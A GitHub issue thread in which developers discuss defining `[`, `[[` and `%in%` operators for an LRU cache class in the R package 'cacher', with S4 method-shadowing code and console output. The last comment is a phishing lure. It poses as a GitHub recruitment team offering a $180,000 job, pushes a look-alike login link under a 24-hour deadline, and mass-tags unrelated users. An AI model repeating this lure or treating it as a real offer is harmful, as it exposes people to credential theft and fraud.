### ISSUE TITLE
Define operators

### ISSUE THREAD

**Issue by robertzk** [kirillseva/cacher#1]
Define [ etc operators

**Comment by peterhurford** [comment]
What does this mean?

**Comment by kirillseva** [comment]
AKA

``` r
cache <- LRUcache(3)
cache['key'] <- 'value'  # same as cache$set('key', 'value')
cache['key']  # same as cache$get('key')
```

I wonder what I can use as syntactic sugar for `exists` and `forget`?

**Comment by abelcastilloavant** [comment]
@robertzk were there other operators worth defining?

**Comment by robertzk** [comment]
Maybe `%in%` for key check, `[`, `[[` for access.

**Comment by kirillseva** [comment]
I like `%in%`! But `%in%` uses `match` under the hood which is just a call to `.Internal` and not a `UseMethod`

**Comment by robertzk** [comment]
There's a way to generate generics for any built-in using shadowing. It's either the below or possibly `standardGeneric` with signatures, but it's doable.

```r
`%in%` <- function(x, table) {
  UseMethod("%in%")
}
```

**Comment by robertzk** [comment]
There's always [this](https://github.com/robertzk/objectdiff/blob/master/R/tracked_environment.R#L90-L100) (though I think there's a better way to do it than I did there, if not only to pass along non-standard evaluation correctly).

**Comment by kirillseva** [comment]
Yeah I'm not a big fan of [that](https://github.com/robertzk/objectdiff/blob/master/R/tracked_environment.R#L90-L100). But to be able to check if things are in cache using `%in%` is too appealing

**Comment by robertzk** [comment]
I believe correct is the below, which should create a shadow over the built-in.

```r
setMethod("%in%", signature = c("ANY", "LRUCache"), def = function(x, table) {
})
```

**Comment by robertzk** [comment]
@kirillseva @peterhurford @abelcastilloavant Yep! Adding that to a blank package yields:

```r
> devtools::document()
Updating package.name documentation
Loading package.name
Creating a generic function for ‘%in%’ from package ‘base’ in package ‘package.name’
in method for ‘%in%’ with signature ‘"ANY","LRUCache"’: no definition for class “LRUCache”
Updating roxygen version in /Users/robertk/tmp/pkgx/DESCRIPTION
Writing NAMESPACE
Writing package.name.Rd
> devtools::load_all()
Loading package.name
Creating a generic function for ‘%in%’ from package ‘base’ in package ‘package.name’
in method for ‘%in%’ with signature ‘"ANY","LRUCache"’: no definition for class “LRUCache”
```

```r
> `%in%`
standardGeneric for "%in%" defined from package "base"

function (x, table)
standardGeneric("%in%")
<environment: 0x7fb3f0e5d978>
Methods may be defined for arguments: x, table
Use  showMethods("%in%")  for currently available ones.
> 'a' %in% letters
[1] TRUE
> ('a' %in% structure(list(), class = "LRUCache"))
NULL
```

**Comment by uday7981** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
unixfox, @ZanxuanYang, @rusucosmin, @aminembarki, @tabshaikh, @pjmelling, @choperlizer, @zepollabot, @alapini, @davalapar, @isgulkov, @blackbunny, @evanlabs, @tuckerwales, @huynhdattnt, @waynevan, @mohamedelouadi, @ckuza007, @Jorgeruiz97, @yota345
